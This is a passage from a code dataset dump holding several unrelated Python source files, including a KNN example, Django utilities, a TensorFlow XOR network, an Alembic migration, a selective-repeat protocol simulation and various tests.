if(iterator==0):\n column=\"State\"\n elif(iterator==2):\n column=\"WellID\" \n elif(iterator==3): \n column=\"ApprovedDate\" \n elif(iterator==4): \n column=\"DLSSurfaceCoordinates\"\n elif(iterator==5): \n column=\"FilingPurposeId\"\n elif(iterator==6): \n column=\"NavportPermitId\" \n elif(iterator==7): \n column=\"CompletionOperatorId\" \n elif(iterator==8): \n column=\"OperatorNumber\"\n elif(iterator==9): \n column=\"PermitNumber\" \n elif(iterator==10): \n column=\"SubmittedDate\"\n elif(iterator==11): \n column=\"TotalDepth\" \n elif(iterator==12): \n column=\"TrajectoryId\" \n elif(iterator==13): \n column=\"ValidUntil\" \n elif(iterator==14): \n column=\"WellNumber\" \n elif(iterator==15): \n column=\"dateinserted\" \n elif(iterator==16): \n column=\"CompletionOperatorIdNonStandardized\" \n elif(iterator==17): \n column=\"WellName\" \n elif(iterator==18): \n column=\"MineralRightsId\" \n elif(iterator==19): \n column=\"PermitAPI\" \n elif(iterator==20): \n column=\"WellClassificationId\" \n elif(iterator==21): \n column=\"TargetedHydrocarbonId\" \n elif(iterator==22): \n 
column=\"CompletionId\"\n elif(iterator==23): \n column=\"LeaseId\" \n elif(iterator==24): \n column=\"SpudDate\"\n elif(iterator==25): \n column=\"FormationId\"\n elif(iterator==26): \n column=\"FieldId\" \n \n logfile.write(\"There was a mismatch at PermitID \"+key+\" with respect to column \"+column +\"\\n\")\n logfile.write(\"Answer key entry was \"+Answer[iterator]+\" present entry is \"+Permits[iterator]+\"\\n\")\n iterator=iterator+1 \n \n except Exception as e:\n print(\"The exception is :\"+ str(e))\n logfile.write(\"The exception is :\"+ str(e)+\"\\n\")\n print(\"The following PermitID :\"+key+\" was not found\") \n logfile.write(\"The following PermitID :\"+key+\" was not found \\n\")\n \n \n\nif __name__ == '__main__':\n pass","sub_path":"Data_Quality/Prism_Data_Quality/Archived/Permit_Changes.py","file_name":"Permit_Changes.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"284877358","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 2 13:02:24 2020\n\n@author: Victor\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom knn import KNN\n\n# x(n)--< Weight kg, Height m >---\nx1=np.array([[49],[1.43]]) # children\nx2=np.array([[51],[1.55]])\nx3=np.array([[57],[1.58]])\nx4=np.array([[47],[1.55]])\nx5=np.array([[54],[1.60]])\nx6=np.array([[56],[1.58]])\nx7=np.array([[59],[1.64]])\nx8=np.array([[53],[1.61]])\nx9=np.array([[58],[1.63]])\nx10=np.array([[52],[1.60]]) # adults\nx11=np.array([[75],[1.73]])\nx12=np.array([[80],[1.75]])\nx13=np.array([[75],[1.69]])\nx14=np.array([[65],[1.71]])\nx15=np.array([[75],[1.79]])\nx16=np.array([[77],[1.76]])\nx17=np.array([[65],[1.71]])\nx18=np.array([[70],[1.70]])\nx19=np.array([[78],[1.81]])\nx20=np.array([[70],[1.67]])\n\nc0=np.zeros(10) \nc1=np.ones(10)\n\nX=np.concatenate((x1,x2,x3,x4,x5,x6,x7,x8,x9,x10,x11,x12,x13,x14,x15,x16,x17,x18,x19,x20),axis=1)\nC=np.concatenate((c0,c1),axis=0)\nC=np.uint8(C)\n\n# new data points to classify with KNN\ny1=np.array([[62],[1.73]])\ny2=np.array([[70],[1.78]])\ny3=np.array([[53],[1.68]])\nY=np.concatenate((y1,y2,y3),axis=1)\n\nfor i in range(X.shape[1]):\n if C[i]==0:\n marcar='v'\n color='red'\n else:\n marcar='o'\n color='blue'\n plt.scatter(x=X[0,i],y=X[1,i],c=color,s=100,marker=marcar)\n\nfor j in range(Y.shape[1]):\n plt.scatter(x=Y[0,j],y=Y[1,j],c='black',s=100,marker='s')\n\nplt.xlabel('Peso (kg)')\nplt.ylabel('Estatura (m)')\nplt.title('Clasificador KNN')\nplt.legend()\n\n# initialize the KNN classifier\nclasificador = KNN(k=15)\nclasificador.aprendizaje(X,C) # learning (fit) phase\nclasificar = clasificador.clasificacion(Y)\nprint('clases de los puntos y(n): ',clasificar)\n","sub_path":"ejemplo_knn.py","file_name":"ejemplo_knn.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"61128209","text":"import random\nimport smtplib\nimport string\n\nfrom django.utils.text import slugify\n\n\n\ndef random_string_generator(size=10, chars=string.ascii_lowercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef unique_user_slug_generator(instance, new_slug=None):\n \"\"\"\n This is for a Django project and it assumes your instance\n has a model with a slug field and a title character (char) field.\n \"\"\"\n slug = new_slug if new_slug is not None else slugify(instance.username)\n Klass = instance.__class__\n qs_exists = Klass.objects.filter(slug=slug).exists()\n if qs_exists:\n 
new_slug = \"{slug}-{randstr}\".format(\n slug=slug,\n randstr=random_string_generator(size=4)\n )\n # recurse into the user-slug generator; unique_slug_generator\n # slugifies instance.name instead of the username\n return unique_user_slug_generator(instance, new_slug=new_slug)\n return slug\n\n\ndef unique_slug_generator(instance, new_slug=None):\n \"\"\"\n This is for a Django project and it assumes your instance\n has a model with a slug field and a title character (char) field.\n \"\"\"\n slug = new_slug if new_slug is not None else slugify(instance.name)\n Klass = instance.__class__\n qs_exists = Klass.objects.filter(slug=slug).exists()\n if qs_exists:\n new_slug = \"{slug}-{randstr}\".format(\n slug=slug,\n randstr=random_string_generator(size=4)\n )\n return unique_slug_generator(instance, new_slug=new_slug)\n return slug\n\n\ndef send_email(user, password, recipient, subject, body):\n\n gmail_user = user\n gmail_pwd = password\n FROM = user\n TO = recipient if type(recipient) is list else [recipient]\n SUBJECT = subject\n TEXT = body\n\n # Prepare actual message\n message = f\"\"\"From: {FROM}\\nTo: {\", \".join(TO)}\\nSubject: {SUBJECT}\\n\\n{TEXT}\n \"\"\"\n\n server = smtplib.SMTP(\"smtp.gmail.com\", 587)\n server.ehlo()\n server.starttls()\n server.login(gmail_user, gmail_pwd)\n server.sendmail(FROM, TO, message)\n print(\"email sent!\")\n server.close()","sub_path":"helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"126929998","text":"#!/bin/python\nimport pandas as pd\nimport random\n\ndef bootstrap_znz(target_train,data_train,znz_ratio=1):\n zeros = []\n nonzeros = []\n for index, row in target_train.iteritems():\n if row:\n nonzeros += [index]\n else:\n zeros += [index]\n #print \"nonzeros = \",len(nonzeros), \"; zeros = \", len(zeros)\n bootstrap_target_train = pd.Series()\n bootstrap_data_train = pd.DataFrame(columns= data_train.columns)\n n_bootstrap_samples = len(nonzeros)+int((len(zeros)-len(nonzeros))*znz_ratio)\n samples = []\n for i in range(n_bootstrap_samples):\n samples += [random.choice(nonzeros)]\n bootstrap_target_train = bootstrap_target_train.append(target_train[samples])\n bootstrap_data_train = bootstrap_data_train.append(data_train.loc[samples,:])\n target_train.drop(nonzeros,inplace=True)\n data_train.drop(nonzeros,inplace=True)\n target_train = target_train.append(bootstrap_target_train)\n data_train = data_train.append(bootstrap_data_train)\n return target_train,data_train\n","sub_path":"clasreg/bootstrap_znz.py","file_name":"bootstrap_znz.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"395609904","text":"# Copyright 2018 The Fuchsia Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom recipe_engine import recipe_api\n\n\nclass CatapultApi(recipe_api.RecipeApi):\n \"\"\"CatapultApi provides support for the Catapult infra tool.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(CatapultApi, self).__init__(*args, **kwargs)\n self._catapult = None\n\n def __call__(self, *args, **kwargs):\n \"\"\"Return a catapult command step.\"\"\"\n assert self._catapult\n\n subcommand = args[0] # E.g. 
'make_histogram' or 'update'\n flags = list(args[1:])\n full_cmd = [self._catapult, subcommand] + flags\n\n name = kwargs.pop('name', 'catapult ' + subcommand)\n return self.m.step(name, full_cmd, **kwargs)\n\n def ensure_catapult(self, version=None):\n with self.m.step.nest('ensure_catapult'):\n with self.m.context(infra_steps=True):\n catapult_package = (\n 'fuchsia/infra/catapult/%s' % self.m.cipd.platform_suffix())\n cipd_dir = self.m.path['start_dir'].join('cipd', 'catapult')\n\n self.m.cipd.ensure(cipd_dir, {catapult_package: version or 'latest'})\n self._catapult = cipd_dir.join('catapult')\n\n return self._catapult\n\n def upload(self, input_file, url, timeout=None, **kwargs):\n \"\"\"\n Uploads performance JSON data to a dashboard.\n\n Args:\n input_file (Path): Full path to the input file to upload.\n url (string): The url to upload data to.\n timeout (string): Optional request timeout duration string. e.g. 12s or\n 1m.\n kwargs: Keyword arguments passed to the returned step.\n\n Returns:\n A step to execute the upload subcommand.\n \"\"\"\n args = ['upload', '-url', url]\n if timeout:\n args += ['-timeout', timeout]\n args.append(input_file)\n\n return self(*args, **kwargs)\n","sub_path":"recipe_modules/catapult/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"126441388","text":"import tensorflow as tf\nimport numpy as np\n\nxy = np.loadtxt('train_XOR.txt', unpack=True, dtype='float32')\nx_data = xy[:-1]\ny_data = xy[-1]\nprint(x_data)\nW1_1 = tf.Variable(tf.random_uniform([2,2], -1., 1.))\nb1_1 = tf.Variable(tf.random_uniform([2,4], -1., 1.))\nW2_1 = tf.Variable(tf.random_uniform([1,2], -1., 1.))\nb2_1 = tf.Variable(tf.random_uniform([1,4], -1., 1.))\n\n# apply the bias before the sigmoid so each layer output stays in (0, 1)\nK1 = tf.sigmoid(tf.matmul(W1_1,x_data) + b1_1)\nK2 = tf.sigmoid(tf.matmul(W2_1,K1) + b2_1)\ncost = tf.reduce_sum(tf.square(K2 - y_data))\ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(cost)\n\ntest = tf.where(K2 > .5,[[1]*4],[[0]*4]) \n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor step in range(201):\n sess.run(train)\n if step % 20 == 0:\n print(step, sess.run(cost))\n print(' ', np.round(sess.run(K2)))\n","sub_path":"XOR3.py","file_name":"XOR3.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"207962901","text":"# Copyright (C) 2019 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"\nAdd new ACR Assignee, Verifier, Compliance Contacts and merge Contacts\n\nCreate Date: 2018-08-15 15:19:46.890174\n\"\"\"\n# disable Invalid constant name pylint warning for mandatory Alembic variables.\n# pylint: disable=invalid-name\n\nfrom alembic import op\n\nfrom ggrc.migrations.utils.migrator import get_migration_user_id\nfrom ggrc.migrations.utils import \\\n acr_propagation_constants_scoping_objects_merge_roles \\\n as scoping_objects_rules\nfrom ggrc.migrations.utils import acr_propagation\n\n# revision identifiers, used by Alembic.\nrevision = '210d6ec78436'\ndown_revision = '31cde07a1abe'\n\n\nSCOPING_OBJECTS = [\n \"AccessGroup\",\n \"DataAsset\",\n \"Facility\",\n \"Market\",\n \"Metric\",\n \"OrgGroup\",\n \"Process\",\n \"Product\",\n \"ProductGroup\",\n \"Project\",\n \"System\",\n \"TechnologyEnvironment\",\n \"Vendor\",\n]\n\nNEW_ROLES = [\n \"Assignee\",\n \"Verifier\",\n \"Compliance Contacts\",\n]\n\nMANDATORY = {\n \"Assignee\": 1,\n 
\"Verifier\": 1,\n \"Compliance Contacts\": 0,\n}\n\nDEFAULT_TO_CURRENT_USER = {\n \"Assignee\": 1,\n \"Verifier\": 1,\n \"Compliance Contacts\": 0,\n}\n\n\ndef _add_roles_for_objects(objects, new_roles):\n \"\"\"\n Creates new roles in acr for a given list of objects.\n :param objects: object names for which new roles should be added\n :param new_roles: list of roles to add into the acr\n \"\"\"\n connection = op.get_bind()\n user_id = get_migration_user_id(connection)\n\n update_entries = []\n for object_name in objects:\n for role_name in new_roles:\n update_entries.append(\n \"('{}', '{}', NOW(), NOW(), {}, 1, {}, {})\".format(\n role_name,\n object_name,\n user_id,\n MANDATORY[role_name],\n DEFAULT_TO_CURRENT_USER[role_name]\n )\n )\n insert_sql = \"\"\"\n INSERT INTO access_control_roles (\n name,\n object_type,\n created_at,\n updated_at,\n modified_by_id,\n non_editable,\n mandatory,\n default_to_current_user\n ) values \"\"\" + \", \".join(update_entries)\n connection.execute(insert_sql)\n\n\ndef upgrade():\n \"\"\"Upgrade database schema and/or data, creating a new revision.\"\"\"\n # Add Assignee, Verifier roles\n _add_roles_for_objects(SCOPING_OBJECTS, NEW_ROLES)\n # Propagate Assignee, Verifier roles\n acr_propagation.propagate_roles(\n scoping_objects_rules.GGRC_NEW_ROLES_PROPAGATION,\n with_update=True\n )\n\n\ndef downgrade():\n \"\"\"Downgrade database schema and/or data back to the previous revision.\"\"\"\n raise Exception(\"Downgrade is not supported.\")\n","sub_path":"src/ggrc/migrations/versions/20180815151946_210d6ec78436_merge_acr_scoping_obj.py","file_name":"20180815151946_210d6ec78436_merge_acr_scoping_obj.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"410902342","text":"import random\nimport pickle\nimport time\n\n#-------------------------------------------------------------------------------------------------------\ntot_frames = 16\nn = 3\nm = pow(2,n)\nframe_send_at_instance = (m // 2)\nsend = []\nrcvd = []\nrcvd_ack = []\nt = 0\narr = []\nduplicate = []\nrw = frame_send_at_instance\nsw = frame_send_at_instance\nfile = ''\nfile = open(\"the.txt\",\"ab\")\nfile.seek(0)\nfile.truncate(0)\npacket = []\nflow = []\npacket1 = []\nsize = 0\n\nfor i in range(tot_frames) :\n arr.append(t)\n t = (t+1)%m\n\nfor i in range(frame_send_at_instance) :\n send.append(arr[i])\n rcvd.append(arr[i])\n rcvd_ack.append('n')\n\n#-------------------------------------------------------------------------------------------------------\n\ndef receiver() :\n global m\n global frame_send_at_instance\n global rcvd_ack\n global send\n global rcvd,flow,tot_frames\n global rw\n global arr\n global sw,duplicate\n global packet,file,packet1,size\n \n while size < tot_frames :\n for i in range(frame_send_at_instance) :\n if rcvd_ack[i] == 'n' :\n f = random.randint(0,9)\n if f != 5 :\n j = 0\n \n while j < frame_send_at_instance :\n if rcvd[j] == send[i] :\n print(\"RECEIVER SIDE : Frame \",rcvd[j],\" received correctly\")\n rcvd[j] = arr[rw]\n rw = (rw+1) % m\n break\n j += 1\n a1 = random.randint(0,4)\n print(\"--------------------------------------------------------------------------------\")\n if a1 == 3 :\n print(\"RECEIVER SIDE : Acknowledgement : \",send[i],\" lost)\")\n packet.append([\"Acknowledgement Lost\",send[i]])\n rcvd_ack[i] = 'n'\n flow.append(1)\n size += 1\n print(\"--------------------------------------------------------------------------------\")\n else :\n print(\"SENDER 
SIDE : Acknowledgement \",send[i],\" received \")\n packet.append([\"Acknowledgement Received\",send[i]])\n rcvd_ack[i] = 'p'\n flow.append(2)\n size += 1\n print(\"--------------------------------------------------------------------------------\")\n else :\n ld = random.randint(0,1)\n if ld == 0:\n print(\"RECEIVER SIDE : Frame \",send[i],\" is damaged.\")\n packet.append([\"Frame Damaged\",send[i]])\n print(\"RECEIVER SIDE : Negative Acknowledgement \",send[i],\" send\")\n flow.append(3)\n print(\"--------------------------------------------------------------------------------\")\n else :\n print(\"SENDER SIDE : Frame \",send[i],\" is lost\")\n packet.append([\"Frame Lost\",send[i]])\n print(\" Sender Timeouts -- Resend Frame\")\n flow.append(4)\n print(\"--------------------------------------------------------------------------------\")\n \n b = 0\n\n while b < frame_send_at_instance :\n if (rcvd_ack[b] == 'n' and flow[b] == 4) or (rcvd_ack[b] == 'n' and flow[b] == 3) :\n break\n b += 1\n \n i = 0\n\n \n for k in range(b,frame_send_at_instance) :\n \n if rcvd_ack[k] == 'n' and ( flow[k] != 1 and flow[k] != 2 ):\n rcvd_ack[i] = 'n'\n send[i] = send[k]\n packet1.append('yes')\n i+= 1\n\n flow = [] \n if len(packet1) > 0 :\n frame_send_at_instance = len(packet1)\n packet1 = []\n else :\n frame_send_at_instance = 4\n if i != frame_send_at_instance :\n for k in range(i,frame_send_at_instance) :\n send[k] = arr[sw]\n sw = (sw + 1)%m\n rcvd_ack[k] = 'n'\n \n pickle.dump(packet,file)\n print(\"--------------------------------------------------------------------------------\")\n ch = input('Do You want to transfer again : ')\n print(\"--------------------------------------------------------------------------------\")\n if ch == 'y' and size < tot_frames:\n sender()\n else :\n print('All frames send')\n exit()\n\n\n#-------------------------------------------------------------------------------------------------------\n\ndef sender() :\n global m\n global frame_send_at_instance\n global rcvd_ack\n global send\n global duplicate\n global packet,file,packet1,size,tot_frames\n\n if size >= tot_frames :\n print('All frames send')\n time.sleep(5)\n exit()\n elif tot_frames - size < 4 :\n frame_send_at_instance = tot_frames - size\n\n packet = []\n \n print(\"--------------------------------------------------------------------------------\")\n for i in range(frame_send_at_instance) :\n print(\"SENDER : Frame : \",send[i],\" is sent\")\n packet.append(send[i])\n print(\"--------------------------------------------------------------------------------\")\n \n receiver()\n\nsender()\n#-------------------------------------------------------------------------------------------------------\n","sub_path":"SR.py","file_name":"SR.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"369584012","text":"from contextlib import closing\nfrom collections import OrderedDict\nfrom django.db import connection\nfrom rest_framework.exceptions import NotFound\n\nimport json\ndef dictfetchall(cursor):\n \"Return all rows from a cursor as a dict\"\n columns = [col[0] for col in cursor.description]\n return [\n dict(zip(columns, row))\n for row in cursor.fetchall()\n ]\n\ndef dictfetchone(cursor):\n row = cursor.fetchone()\n if row is None:\n return False\n columns = [col[0] for col in cursor.description]\n return dict(zip(columns, row))\n\ndef get_category_products():\n category_products = query_category_products()\n items = []\n 
for category_product in category_products:\n items.append(\n OrderedDict(\n {\n \"id\": category_product['id'],\n \"title\": category_product['title'],\n \"products\": json.loads(category_product['products']),\n \"slug\": category_product['slug']\n }\n )\n )\n return items\n\ndef query_category_products():\n with closing(connection.cursor()) as cursor:\n cursor.execute(\"\"\"\n with table1 as (SELECT c.*, (SELECT JSONB_AGG(v) FROM (SELECT food_product.* FROM food_product WHERE \n food_product.category_id = c.id) v) AS products FROM food_category c)\n select table1.* from table1 where table1.products is not null;\n \"\"\")\n category_products = dictfetchall(cursor)\n return category_products\n\ndef query_customer(phone_number):\n with closing(connection.cursor()) as cursor:\n cursor.execute(\"\"\" \n SELECT * from food_customer WHERE food_customer.phone_number = %s\n \"\"\", [phone_number])\n customer = dictfetchone(cursor)\n return customer\n\ndef get_customer_by_phone(phone_number):\n customer = query_customer(phone_number)\n return OrderedDict(\n {\n \"id\": customer['id'],\n \"first_name\": customer['first_name'],\n \"last_name\": customer['last_name'],\n \"phone_number\": customer['phone_number']\n }\n )\n\ndef get_products_by_ids(ids):\n with closing(connection.cursor()) as cursor:\n cursor.execute(\n f\"\"\"SELECT * FROM food_product WHERE id in ({str(ids).strip(\"[]\")})\"\"\"\n )\n products = dictfetchall(cursor)\n return products\n\n","sub_path":"mysite/food/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"443431261","text":"from .models import package,robot,shelf,hidden_package,drop_zone\nfrom .models import task\nfrom .models import node as nd\nimport sys\n\nsys.path.insert(0, \"../Warehouse Generation/\")\nfrom server.CentralServer import CentralServer\nfrom server.Robot import Robot, Size\nfrom server.Scheduler import Scheduler\nfrom networking.NetworkInterface import NetworkInterface\nfrom server.Parcel import Parcel\nfrom server.Shelf import Shelf, ShelfInfo\nfrom server.routing.Graph import Graph\nfrom server.sample_db_output import db_output\nfrom warehouse.server_setup import requestParcel,addRobots\nimport threading\n#from warehouse_generator import create_world\nimport json_parser as js\nfrom warehouse_generator import create_world\nimport json\n\ndef sim_json(json_str):\n # floor_size = [4,4]\n\n # sys.path.insert(0, \"../Warehouse Generation/json_parser.py\")\n\n\n print(\"Sim JSON\")\n\n file = open(\"../Warehouse Generation/json.txt\", \"w+\")\n file.write(json_str)\n file.close()\n dic = json.loads(json_str)\n shelveHeight = dic.get('shelveHeight')\n compartments = dic.get('compartments')\n print(dic)\n print(f\"height: {shelveHeight}, compartments: {compartments}\")\n # print(1)\n\n shelf_size = [1, shelveHeight, 1]\n number_of_racks = compartments\n line_distance_from_shelf = 0.2\n # grid_array = [\n # [2,2,2,5],\n # [5,5,5,5],\n # [5,6,6,5],\n # [6,6,6,6],\n # ]\n\n grid_array = js.grid()[0]\n floor_size = js.grid()[1] # gets values from json.txt\n grid_ids = js.grid()[2]\n\n print(grid_ids)\n print(grid_array)\n create_world(\"warehouse.wbt\", floor_size, shelf_size, number_of_racks, line_distance_from_shelf, grid_array, grid_ids)\n print(\"World Successfully generated.\")\n # pass\n\ndef get_connected_nodes(id):\n dictionary = get_node_dict()\n return dictionary.get(id)\n\ndef create_task(r,p,h):\n 
task.objects.create(robot=r,package=p,holding_package=h)\n\ndef package_request(packs):\n testing = False\n if testing:\n addRobots()\n my_shelf = Shelf(1, 2, 26)\n shelf_info = ShelfInfo(my_shelf, 1)\n # Create parcel instance from the package\n parcel = Parcel(12., Size(.35, .35, .35), 16, shelf_info)\n t = threading.Thread(target=requestParcel, args=(parcel,), daemon=True)\n t.start()\n else:\n #addRobots()\n #Get dropzone\n for drop in drop_zone.objects.all():\n drop_id = drop.node.id\n #As long as we don't have a dropzone in warehouse gen\n #(a queryset is never None, so check emptiness instead)\n if not drop_zone.objects.exists():\n drop_id = 0 \n for id in packs:\n pack = packs.get(id)\n #print('Parcel:{}'.format(pack.old_id))\n #print('Shelf:{}'.format(pack.shelf))\n #print('Node:{}'.format(pack.shelf.node))\n #Get the shelf the node is in\n shelf = pack.shelf\n #Create shelf instance\n my_shelf = Shelf(shelf.compartment_size, shelf.number_of_compartments, shelf.node.id)\n #Shelf_info from the shelf\n shelf_info = ShelfInfo(my_shelf, pack.shelf_compartment)\n # Create parcel instance from the package\n parcel = Parcel(pack.weight, Size(.35, .35, .35), shelf.node.id, shelf_info)\n t = threading.Thread(target=requestParcel, args=(id, parcel, drop_id), daemon=True)\n t.start()\n #requestParcel(id,parcel,drop_id)","sub_path":"website/design/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"115535461","text":"'''\nCreated on Nov 26, 2014\n\n@author: Iulian\n'''\nimport unittest\nfrom catalog.domain.validators import StudentDisciplineValidator,\\\n DisciplineValidator, StudentValidator\nfrom catalog.domain.entities import Student_Discipline, Discipline, Student\nfrom catalog.repository.repository import Repository\n #StudentDisciplineRepository\nfrom catalog.controller.discipline_controller import DisciplineController\nfrom catalog.controller.student_controller import StudentController\nfrom catalog.controller.student_discipline_controller import StudentDisciplineController\n\nclass StudentDisciplineControllerTestCase(unittest.TestCase):\n def setUp(self):\n self.__DisciplineRepo = Repository(DisciplineValidator())\n d1 = Discipline(1, \"mate\", \"prof mate\")\n d2 = Discipline(2, \"info\", \"prof info\")\n self.__DisciplineRepo.add_item(d1)\n self.__DisciplineRepo.add_item(d2)\n self.__Dctrl = DisciplineController(self.__DisciplineRepo)\n \n self.__StudentRepo = Repository(StudentValidator())\n s1 = Student(3, \"Ion\")\n s2 = Student(2, \"Maria\")\n s3 = Student(1, \"Ionica\")\n self.__StudentRepo.add_item(s1)\n self.__StudentRepo.add_item(s2)\n self.__StudentRepo.add_item(s3)\n self.__Sctrl = StudentController(self.__StudentRepo)\n \n self.__repo = Repository(StudentDisciplineValidator())\n sd = Student_Discipline(1, s1.get_student_id(), d1.get_discipline_id(), 6)\n self.__repo.add_item(sd)\n \n sd = Student_Discipline(2, s2.get_student_id(), d2.get_discipline_id(), 8)\n self.__repo.add_item(sd)\n \n sd = Student_Discipline(4, s3.get_student_id(), d2.get_discipline_id(), 3)\n self.__repo.add_item(sd)\n self.__ctrl = StudentDisciplineController(self.__StudentRepo, self.__DisciplineRepo, self.__repo)\n \n def test_assign_grades_student(self):\n s1d1 = self.__ctrl.assign_grades_student(1, 3, 2, 8)\n assert s1d1.get_student_discipline_id() == 1\n assert s1d1.get_discipline_id() == 2\n assert s1d1.get_student_id() == 3\n assert s1d1.get_grade() == 8\n \n 
s1d1 = self.__ctrl.assign_grades_student(3, 1, 1, 4)\n assert s1d1.get_discipline_id() == 1\n assert s1d1.get_student_id() == 1\n assert s1d1.get_grade() == 4\n \n def test_student_grade_change(self):\n s1d1 = self.__repo.find_by_id(1)\n s1d1 = self.__ctrl.student_grade_change(s1d1.get_student_discipline_id(), 10)\n assert s1d1.get_discipline_id() == 1\n assert s1d1.get_student_id() == 3\n assert s1d1.get_grade() == 10\n \n def test_get_students_with_disciplines_and_grades(self):\n l = self.__ctrl.get_students_with_disciplines_and_grades()\n assert len(l) == 3\n \n def test_students_and_grades_at_one_discipline_sorted(self):\n l = self.__ctrl.students_and_grades_at_one_discipline_sorted(2)\n assert len(l) == 2\n l = self.__ctrl.students_and_grades_at_one_discipline_sorted(1)\n assert len(l) == 1\n \n def test_students_and_grades_at_one_discipline_sorted_by_grade(self):\n l = self.__ctrl.students_and_grades_at_one_discipline_sorted_by_grade(2)\n assert len(l) == 2\n assert l[0].grade == 8\n assert l[1].grade == 3\n \ndef suite():\n suite = unittest.TestSuite()\n suite.addTests(unittest.TestLoader().loadTestsFromTestCase(StudentDisciplineControllerTestCase))\n return suite\n","sub_path":"Fundamentele programarii/lab 7-9/lab7-9/test/test/catalog/controller/test_student_discipline_controller.py","file_name":"test_student_discipline_controller.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"252396265","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 28 17:59:40 2018\n\n@author: averma\n\"\"\"\n\n\n# =============================================================================\n# #FANCY INDEXING\n# =============================================================================\nimport numpy as np\n\nrand=np.random.RandomState(42)\nx=rand.randint(100, size=10)\nprint(x)\n#Suppose we want to access three different elements. We could do it like this\nindices=[3,7,4]\ny=x[indices]\nprint(y)\n#for 2d array, pass y=x[[...],[...]], the first indices are rows and the second are columns, pg79\n#mix both simple and fancy indices, y=x[2,[...]], 3rd row (means index=2) and [...] 
are columns\n#like\nind = np.array([[3, 7],\n [4, 5]])\nx[ind]\n#Fancy indexing also works in multiple dimensions\n\nX = np.arange(12).reshape((3, 4))\nX\n\nrow = np.array([0, 1, 2])\ncol = np.array([2, 1, 3])\nX[row, col]\n\n# =============================================================================\n# Combined Indexing\n# =============================================================================\nprint(X)\nX[2, [2, 0, 1]] #We can combine fancy and simple indices\n\nX[1:, [2, 0, 1]] #combine fancy indexing with slicing\n\nmask = np.array([1, 0, 1, 0], dtype=bool) #combine fancy indexing with masking\nX[row[:, np.newaxis], mask]\n\n#SELECT RANDOM POINTS\n#no repeat\n\nindices=np.random.choice(100,20,replace=False)\nprint(indices)\n\n#modifying values with fancy indexing\nx=np.arange(10)\ni=np.array([1,2,3])\nprint(x)\nx[i]=99\nprint(x)\n\n#if i contains repeated indices, result may not be as expected\n#use the following then\n#np.add.at(x,i,1) #rather than x[i]=x[i]+1\n\n\n","sub_path":"numpy/FancyIndexing.py","file_name":"FancyIndexing.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"367279976","text":"import program as program\nimport modules.settings as settings\nimport time\nimport json\nprog = program.Program(settings.Settings())\n\n\ndef test_change_interval_task():\n assert program.change_interval_task('test', 20, prog) == 20\n program.cancel_task('test')\n assert program.change_interval_task('test', 20) is None\n\n\ndef test_get_social_rating():\n prog.settings.subjects = ['max verstappen']\n assert len(prog.get_current_social_rating()) > 0\n\n\ndef test_program_mqtt():\n prog.MQTT.subscribe_topic(\"pacotinie@gmail.com/app\")\n prog.MQTT.send_message(\"test\")\n time.sleep(1) # sleep because sending the message takes time\n assert prog.MQTT.messages[0] == \"test\"\n prog.MQTT.retrieve_message()\n\n\ndef test_check_messages_program():\n msg = prog.check_messages()\n assert msg is None\n prog.MQTT.messages.append(\"testvalue\")\n msg = prog.check_messages()\n assert msg == \"testvalue\"\n\n\ndef test_process_messages():\n prog.MQTT.subscribe_topic(\"pacotinie@gmail.com/app\")\n prog.settings.mode = 'weather'\n prog.settings.brightness = '50'\n # request\n prog.process_messages(\"request|settings\")\n time.sleep(1)\n msg = prog.MQTT.retrieve_message()\n msg_escaped = msg.replace(\"'\", '\"')\n msg_json = json.loads(msg_escaped)\n assert msg_json['mode'] == 'weather'\n prog.process_messages(\"request|mode\")\n time.sleep(1)\n msg = prog.MQTT.retrieve_message()\n assert msg == 'weather'\n # settings\n prog.process_messages(\"settings|{'mode': 'social', 'refresh_interval': 5, 'future_forecast_time': 1, 'brightness': 50, 'subjects': ['max verstappen'], 'location': {'latitude': 51.57046107093778, 'longitude': 5.050113150625251}}\")\n assert prog.settings.mode == 'social'\n # save specific\n assert prog.settings.brightness == 50\n prog.process_messages(\"brightness|70\")\n assert prog.settings.brightness == 70\n\n\ndef test_handle_weather():\n assert prog.handle_weather() is not 